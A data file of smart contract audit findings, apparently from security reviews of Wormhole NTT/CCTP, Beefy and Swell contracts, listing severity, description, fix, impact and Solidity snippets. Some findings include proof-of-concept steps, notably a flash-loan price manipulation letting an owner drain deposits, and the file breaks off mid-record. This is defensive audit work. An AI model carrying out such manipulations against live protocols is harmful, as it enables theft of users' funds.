`TransceiverRegistry::_setTransceiver` after 64 have been registeredчmediumч`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for the re-enabling of previously registered but currently disabled Transceivers.\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n\\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. Assuming a total of 64 registered Transceivers, with some of these Transceivers having been previously disabled, the placement of this latter validation will prevent a disabled Transceiver from being re-enabled since the subsequent block in which the storage indicating its enabled state is set to `true` is not reachable. Consequently, it will not be possible to re-enable any disabled transceivers after having registered the maximum number of Transceivers, meaning that this function will never be callable without redeployment.чMove the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.чUnder normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.ч```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n -NTT Manager cannot be unpaused once pausedчmediumч`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\nч```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчThe inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.ч```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n -Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgradesчmediumчTransceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.чConsider making `Transceiver::_checkImmutables` and `Implementation::_setMigratesImmutables` private functions for Transceivers. If the `_checkImmutables()` function has to be overridden, consider exposing another function that is called inside `_checkImmutables` as follows:\\n```\\nfunction _checkImmutables() private view override {\\n assert(this.nttManager() == nttManager);\\n assert(this.nttManagerToken() == nttManagerToken);\\n _checkAdditionalImmutables();\\n}\\n\\nfunction _checkAdditionalImmutables() private view virtual override {}\\n```\\nчWhile this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is prescient to note.\\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed to reflect the `true` functionality.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), \"\")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr(\"new transceiver owner\"));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr(\"new ntt manager owner\"));\\n}\\n```\\nч```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n -Asymmetry in Transceiver pausing capabilityчlowчPausing functionality is exposed via Transceiver::_pauseTransceiver; however, there is no corresponding function that exposes unpausing functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\nч```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчWhile not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.ч```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n -Incorrect Transceiver payload prefix definitionчlowчThe `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, which is output when running the following command:\\n```\\ncast --from-utf8 \"EWH\"\\n```\\nчUpdate the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\nчWhile still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.ч```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n -Redemptions are blocked when L2 sequencers are downчmediumчGiven that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\nчValidation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.чFailure to consider the aliased `mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.ч```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\n -Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`чlowч`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the `length` of the `encoded` bytes parameter `encoded` itself. If the `length` of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (\"memory-safe\") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting `for` its `length` and accompanying `shift` calculation depending on the `length` supplied, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. Therefore, regardless of the `length` of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.чConsider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.чThe impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. This latter function is utilized in two places:ч```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (\"memory-safe\") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n -A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`чlowч`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, \"chain already registered\");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\nчConsider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, \"CCTP domain already registered for a different foreign chain\");\\n```\\nчThe impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.ч```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, \"chain already registered\");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n -Lack of Governance action to update registered emittersчlowчThe Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\nчThe addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.чIn the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue designate a low severity issue.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.ч```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n -Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expiresчlowчWormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters:: expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, \"guardian set has expired\");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.чThe practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.чThere is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintReceipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.ч```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n -`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updatedчmediumч`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract to enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.ч1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.чThe old `unirouter` contract will continue to have ERC20 token approvals for `StratFeeManagerInitializable` so it can continue to spend the protocol's tokens when this is not the protocol's intention as the protocol has changed `unirouter`.ч```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n -Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parametersчlowчWhile `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the depositчBeefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.чOwner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.ч```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n -`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge casesчlowчIn Uniswap V3 liquidity providers can only provide liquidity between price ranges `[1.0001^{MIN_ TICK};1.0001^{MAX_TICK})`. Therefore these are the min and max prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DOS deposits, withdrawals and harvests when they should be allowed for as long as the state holds.чConsider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\nчч```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n -Withdraw can return zero tokens while burning a positive amount of sharesчlowчInvariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\nчChange the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\nчProtocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.ч```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n -`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`чmediumчWhen users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction 